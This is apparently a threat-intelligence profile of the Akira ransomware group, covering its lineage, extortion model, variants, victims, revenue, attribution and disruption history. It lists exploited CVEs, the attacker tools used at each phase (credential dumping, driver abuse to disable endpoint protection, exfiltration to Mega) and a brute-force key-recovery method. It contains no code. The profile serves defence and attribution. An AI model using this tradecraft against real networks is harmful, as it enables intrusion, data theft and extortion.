Overview
Akira is a Russian-nexus ransomware operation that emerged in March 2023 as part of the post-Conti diaspora. Operating as a Ransomware-as-a-Service (RaaS) enterprise, the group employs double extortion: data is exfiltrated prior to encryption, creating two independent leverage points against victims. Within its first year, Akira claimed over 250 victims and extracted approximately $42 million in ransom payments. By late 2025, it had become the single most prolific ransomware strain by annual revenue.
The group is tracked across the threat intelligence community under multiple aliases. No infrastructure takedown, domain seizure, or law enforcement operation targeting Akira specifically has been publicly announced as of May 2026.
| Attribute | Detail |
|---|---|
| Tracking aliases | PUNK SPIDER (CrowdStrike), GOLD SAHARA (Secureworks), Storm-1567 (Microsoft), Howling Scorpius (Unit 42) |
| Lineage | Conti diaspora — shared heritage with Wizard Spider / Gold Ulrick (the parent Conti organization); not itself designated Wizard Spider |
| Operational model | Ransomware-as-a-Service; closed RaaS with central operator control |
| Extortion mechanic | Double extortion (encryption + data publication threat); also offers decryption and deletion as separate purchasable options |
| Assessed jurisdiction | Russia / post-Soviet region (CREDIBLE) |
| LE disruption status | None confirmed as of May 2026 |
Origin & Lineage
Akira was first observed in March 2023, with the earliest leak site discovery dated April 26, 2023. It is assessed as unrelated to a prior strain that used the same name and .akira extension in 2017. The group name is assessed as a likely allusion to the 1988 Japanese animated film of the same name (ANALYST INFERENCE; no authoritative confirmation).
Akira emerged precisely during the window in which Conti affiliates required new operational infrastructure following Conti's May 2022 public dissolution. The timing aligns with the documented dispersal of Conti personnel into successor operations including Black Basta (April 2022), BlackByte, Karakurt, Royal/BlackSuit, and Akira.
TRM Labs assesses Akira's developers are located in Russia or the broader post-Soviet region, citing non-VPN IP observations tied to Russia and Russian-language operator communications on dark web forums. S-RM Intelligence corroborates this assessment. The Canadian Centre for Cyber Security assessed Akira as "very likely connected" to former Conti personnel. No founding member or leadership identity has been publicly confirmed.
Attribution to former Conti / Wizard Spider personnel rests on four independent evidentiary pillars. Wizard Spider is CrowdStrike's tracking designation for the Russia-based eCrime group that operated TrickBot, Ryuk, and Conti as sequential campaigns. Secureworks tracks the same core cluster as Gold Ulrick.
Wizard Spider (CrowdStrike) and Gold Ulrick (Secureworks) designate the core Russia-based criminal organization that operated TrickBot, Ryuk, and Conti. Neither designation has been extended to Akira or any specific Conti successor group. They describe shared heritage, not operational identity.
Akira's own vendor-specific tracking designations are: PUNK SPIDER (CrowdStrike, first flagged April 2023, defined as the Big Game Hunting adversary responsible for developing and maintaining Akira ransomware), GOLD SAHARA (Secureworks), Storm-1567 (Microsoft), and Howling Scorpius (Palo Alto Unit 42).
The Royal/BlackSuit branch is tracked separately by CrowdStrike as ROYAL SPIDER, confirming organizational separation between the two major post-Conti successor streams. Secureworks maintains a parallel separation: GOLD SAHARA covers Akira while a distinct designation covers the Royal/BlackSuit lineage. The practical implication: Wizard Spider and Gold Ulrick are correct as shared heritage designators for the parent organization, but the operational aliases for Akira itself are exclusively PUNK SPIDER, GOLD SAHARA, Storm-1567, and Howling Scorpius.
Operational Model
Akira operates as a closed RaaS enterprise (Unit 42 characterization). The affiliate revenue split is not publicly confirmed; Blackpoint Cyber assesses an 80/20 split (80% affiliate, 20% operator) consistent with the modern RaaS standard. S-RM Intelligence notes that Akira maintains control over ransom demands and the discounts affiliates can offer, indicating operator-side leverage even when affiliates conduct individual attacks. The affiliate pool is heterogeneous: S-RM observed "considerable variation in tooling and methodologies among different Akira affiliates."
TRM Labs' on-chain analysis confirms that early payment flows (2023) can be grouped by likely affiliate based on consistent wallet behaviors, providing the clearest structural evidence of the affiliate layer.
Akira employs a sequential extortion model:
- Exfiltration first: Data is exfiltrated prior to encryption. In some 2025 incidents, exfiltration completed within two hours of initial access.
- Encryption extortion: Victims must pay for decryption keys to restore systems.
- Publication threat: Victims must pay separately to prevent data publication on Akira's Tor-based Dedicated Leak Site (DLS).
- Disaggregated payment option: Akira uniquely offers victims the ability to pay for decryption or data deletion separately — a tactic to lower the payment threshold for victims with functional backups.
Beginning in early 2024, Akira temporarily abandoned encryption entirely, focusing on exfiltration-only extortion — assessed by Cisco Talos as reflecting developer retooling time for a new encryptor. Full double extortion resumed by mid-to-late 2024.
Negotiation is conducted through a TOR-based portal accessed via a unique ID from the ransom note. Ransomware.live has archived 61 negotiation chat logs spanning May 2023 through April 2025.
- Negotiations begin promptly, often within hours of encryption deployment
- Operators demonstrate familiarity with victim financials (revenue, insurance coverage)
- Ransom demands are set opportunistically based on victim profile
- Publication threat escalates during stalled negotiations
Technical Profile
| Variant | Language | Extension | Period | Notes |
|---|---|---|---|---|
| Akira v1 | C++ | .akira | Mar–Jul 2023 | Initial release; Avast decryptor released Jun 2023 |
| Akira v1 (patched) | C++ | .akira | Jul 2023+ | Fixed decryption flaw; ransom note: akira_readme.txt |
| Megazord | Rust | .powerranges | Aug 2023+ | Rust-based; deployed alongside C++ variants |
| Akira v2 | Rust | .akira / .aki | 2023–2024 | Additional Rust variant; multiple extension variants |
| Akira (C++ return) | C++ | .akira | Sep 2024+ | Talos: reversion to C++ after retooling period |
Hybrid encryption: ChaCha20 stream cipher for file content, RSA-4096 for key protection. Provides speed (symmetric ChaCha20) while protecting keys asymmetrically, preventing brute-force recovery without the operator-held private key. Volume Shadow Copies (VSS) deleted via PowerShell/WMI to prevent recovery.
- VMware ESXi (April 2023+): Linux variant uses esxcli and vim-cmd to gracefully shut down VMs before encrypting virtual disk files.
- Nutanix AHV (June 2025): First documented attack against Nutanix hypervisor environments. Directly encrypts .qcow2 files without native management commands.
- Microsoft Hyper-V: Also targeted per updated CISA advisory.
| Vector | Notes |
|---|---|
| VPN exploitation without MFA | Dominant vector. Brute force, credential stuffing, or IAB purchase. |
| CVE exploitation | Primarily Cisco ASA/FTD and SonicWall. See CVE table below. |
| Remote Desktop Protocol (RDP) | Stolen or brute-forced credentials |
| Spear phishing | Credential harvesting |
| SSH exploitation | Router IP tunneling |
| Valid credentials (IAB purchase) | ~19.5% of Akira victims had infostealer infection in credential markets |
| CVE | Product | CVSS | Type |
|---|---|---|---|
| CVE-2020-3259 | Cisco ASA/FTD | 7.5 | Information disclosure |
| CVE-2023-20269 | Cisco ASA/FTD | N/A | Authentication bypass |
| CVE-2024-40766 | SonicWall SonicOS SSL-VPN | 9.3 | Improper access control |
| CVE-2024-37085 | VMware ESXi | N/A | Authentication bypass |
| CVE-2023-27532 | Veeam Backup and Replication | N/A | Missing authentication |
| CVE-2024-40711 | Veeam Backup and Replication | N/A | Deserialization |
| CVE-2023-28252 | Windows CLFS | N/A | Privilege escalation |
| CVE-2022-40684 | Fortinet FortiOS | N/A | Authentication bypass |
| Phase | Tools |
|---|---|
| Discovery | Advanced IP Scanner, BloodHound, Masscan, SharpHound, AdFind, SoftPerfect NetScan |
| Credential Access | Mimikatz, LaZagne, Rubeus, SharpDomainSpray (Kerberoasting, LSASS dump) |
| Persistence | Local/domain account creation (e.g., itadm), added to administrator group |
| Lateral Movement | RDP, SSH, MobaXterm, Impacket (wmiexec.py), CrackMapExec, NetExec |
| C2 / Remote Access | AnyDesk, TeamViewer, MeshAgent, RustDesk, ScreenConnect; Ngrok/Cloudflared for tunneling |
| Defense Evasion | PowerTool (Zemana driver abuse), EDR uninstall, POORTRY/BurntCigar BYOVD, log clearing |
| Exfiltration | FileZilla, WinSCP, RClone (to Mega), WinRAR, Temp.sh |
Targeting
| Sector | Victim Count | Notes |
|---|---|---|
| Manufacturing | 352 | Largest single sector |
| Business Services | 313 | |
| Construction | 132 | |
| Technology | 129 | |
| Consumer Services | 96 | |
| Healthcare, Finance, Education, Legal | Significant | No formal sector exclusions documented |
Dragos reported Akira linked to 83 industrial-sector incidents in Q1 2025 alone, representing approximately 12% of all tracked industrial ransomware activity that quarter. Between April 2024 and April 2025, the November 2025 CISA advisory documented Akira attacking 34 financial organizations. FinCEN identified Akira as the most-reported ransomware variant in Bank Secrecy Act filings for the 2022–2024 review period.
| Country | Victim Count | % of Total |
|---|---|---|
| United States | 830 | 55.6% |
| Canada | 77 | 5.2% |
| Germany | 67 | 4.5% |
| United Kingdom | 38 | 2.5% |
| Italy | 34 | 2.3% |
| Other (66 countries) | 446 | 29.9% |
No CIS-region victims documented in any open-source database. Country data from internal records (Q3 2025+) confirms US dominance with additional payments confirmed from Spain, Canada, Ireland, United Kingdom, and Australia.
Primary profile: Small-to-medium enterprises (SMEs). S-RM Intelligence documented 86% of Akira victims have fewer than 1,000 employees.
Selection model: Primarily opportunistic, driven by available initial access (VPN exposure) rather than deliberate sector pre-selection. However, affiliates are assessed to exercise judgment in prioritizing targets with critical data dependencies, cyber insurance, and high operational disruption sensitivity.
Victim Data
| Period | Approx. Victims | Confidence |
|---|---|---|
| Q2–Q4 2023 | ~250 (partial year) | ANALYST INFERENCE for quarterly; CONFIRMED annual |
| 2024 (full year) | ~430 | CREDIBLE (FBI advisory reference) |
| Jan 1–Dec 11, 2025 | ~980 | CONFIRMED (TRM Labs) |
| Q1 2026 | ~150+ | CREDIBLE; 84 in March alone (second most active month on record) |
| Victim | Sector | Date | Notes |
|---|---|---|---|
| Stanford University | Education | Sep 2023 | 27,000 individuals notified |
| Nissan Australia | Automotive | Jan 2024 | 100,000 customers' data compromised |
| Tietoevry (Finland) | IT Services | Jan 2024 | Major Finnish IT provider; disrupted multiple Swedish client systems |
| Lush Cosmetics (UK) | Retail | 2023 | Confirmed victim |
| Toronto Zoo | Public Institution | Jan 2024 | Canadian critical infrastructure |
| Stoli Group | Food and Beverage | 2024 | Evidence of strategic coordination (Halcyon) |
Financial Profile
| Source | Period | Amount | Confidence |
|---|---|---|---|
| FBI/CISA Joint Advisory (Apr 2024) | By Jan 2024 | $42M | Confirmed |
| FinCEN Financial Trend Analysis (Dec 2025) | Apr 2023–Dec 2024 | $120.9M (376 BSA filings) | Confirmed |
| FBI/CISA Updated Advisory (Nov 2025) | Through Sep 2025 | $244.17M | Confirmed |
| TRM Labs Intel Library | 2025 full year | $150M | Confirmed |
Akira was identified as the most prolific ransomware strain by total ransom proceeds in 2025, collecting $150M, nearly twice the second most active strain. FinCEN named Akira the most-reported variant in BSA data for the 2022–2024 review period.
Published demand range (open source): $200,000 to over $4 million USD. Demands set opportunistically based on victim financial profile, insurance coverage, and assessed data value.
Attribution & Nexus
Evidence basis: Russian-language operator communications on dark web forums; non-VPN IP observations tied to Russia; wallet infrastructure overlapping with Conti-affiliated addresses tied to formally sanctioned Russia-based operators. No contradicting evidence in open source.
The Akira binary does not contain the standard kill switch that halts execution when a Russian keyboard layout is detected — a deliberate deviation from virtually all other Russian-linked ransomware families. Despite the absence of the technical safeguard, no CIS-region victims appear in any open-source database.
One confirmed arrest is tied to the Conti organizational entity that operated Akira:
| Attribute | Detail |
|---|---|
| Individual | Deniss Zolotarjovs, 35, Latvian national residing in Moscow |
| Arrest | Georgia (country), December 2023 |
| Transfer | U.S. custody, August 2024 |
| Outcome | Pleaded guilty July 2025; sentenced 102 months (8.5 years), May 3, 2026 |
| Role | Ransom negotiation escalator; weaponized sensitive personal data (including children's health records) to pressure non-paying victims |
| Scope | June 2021–August 2023; 54+ companies; $56M+ documented losses across 13 confirmed victims |
| Critical nuance | Involvement predates Akira's March 2023 standalone emergence. Prosecution covers organizational continuity between the Conti-led parent entity and Akira as a successor brand — not Akira-specific post-2023 activity. |
DOJ sentencing documents explicitly name Akira as one of the brands used by a Conti-led organization whose members "included multiple former Russian law enforcement officers" who "co-opted Russian government databases and law enforcement connections." The organization also paid bribes to exempt members from military conscription and maintained a structured presence in St. Petersburg.
No publicly confirmed direct tasking or control relationship between Akira's operators and Russian state intelligence services (FSB, SVR, or GRU) exists as of May 2026. However, the post-Conti/Wizard Spider ecosystem has documented intelligence-adjacent relationships:
- Recorded Future Dark Covenant 3.0 (October 2025): Leaked Conti communications show senior Conti figures provided data to both GRU and SVR. One operator ("Professor") maintained a paid informant or bribery relationship with SVR contacts.
- Vitalii Kovalev (Conti alias: Stern/Bentley): Assessed by German BKA and confirmed via leaked Qakbot developer chats as "linked to the FSB."
- DOJ sentencing documents (Zolotarjovs): Organization described as including "multiple former Russian law enforcement officers" who "co-opted Russian government databases."
Disruption History & Known Vulnerabilities
The only confirmed technical disruption action: Avast released a free decryptor on June 29, 2023 targeting the original C++ Windows variant. Akira patched the encryption flaw within four days (July 2, 2023), demonstrating active development capacity. A Rust-based Megazord variant followed in August 2023. No publicly released decryptor exists for any subsequent Akira variant as of May 2026.
| Attribute | Detail |
|---|---|
| Root cause | generate_random() calls get_current_time_nanosecond() as seed — insufficiently random. Passed through 1,500 rounds SHA-256 via Yarrow256 PRNG. |
| Attack method | Known-plaintext attack against VMware file headers (flat-VMDK, sesparse, NVRAM). ESXi timestamps constrain the search space. |
| Search space | ~4.5 quadrillion pairs — practical with GPU acceleration |
| Practical cost | 16 x RTX 4090 GPUs (cloud-rentable); ~10 hours recovery time; ~$261 per second-range searched |
| Status | Full source published to GitHub (March 2025). Patch status unconfirmed. |
- April 18, 2024 (AA24-109A): FBI, CISA, Europol EC3, Netherlands NCSC-NL. Original advisory covering TTPs and IOCs through February 2024.
- November 13, 2025 (AA24-109A Rev.): FBI, CISA, DC3, HHS, Europol EC3, France OFAC, Germany LKA-BW, Netherlands NCSC-NL. Added Nutanix AHV targeting, expanded CVE list including SonicWall CVE-2024-40766.
Both advisories constitute information operations (victim notification, IOC sharing) rather than direct disruption. No infrastructure seizures or arrests resulted.
Akira has operated for over 39 months without a direct law enforcement disruption event, making it one of the most durable major ransomware operations in the post-Conti period. No WAIS-scoreable events on record.
- Geographic exposure: Zolotarjovs arrest in Georgia demonstrates that travel outside Russia to non-extradition-treaty countries is an exploitable exposure point.
- On-chain attribution: Centralized laundering infrastructure (Defiway, WanChain, HTX) creates durable attribution opportunities. TRM Labs has successfully grouped affiliate payment flows through wallet cluster analysis and identified the primary cash-out exchange.
- Affiliate trust fragmentation: Recorded Future documented increasing affiliate disputes across the RaaS ecosystem post-Operation Endgame, including non-payment scams — a pattern affecting Akira's peer groups and a potential OPSEC exposure vector.
Status & Trajectory
All trajectory indicators are uniformly expansionary: volume rising, revenue rising, geographic expansion continuing, capability expanding (Nutanix AHV added June 2025, kill chain accelerating to sub-4 hours per Halcyon April 2026), and laundering sophistication increasing through four phase rotations in three years.
The absence of any law enforcement disruption event combined with rising revenue and victim volume suggests Akira has established a durable operational posture. The broader TRM-identified cluster (Fog, Frag, Anubis sharing laundering infrastructure) suggests Akira may function as an operational hub anchoring a wider affiliate ecosystem — consistent with a mature RaaS structure where high-trust affiliates work across multiple brands simultaneously.
Recent Reporting LIVE
Open-source reporting from monitored threat intelligence sources. Refreshed automatically every 8 hours via ransomware.live and major TI blog feeds. Authored analysis above is unaffected by this feed.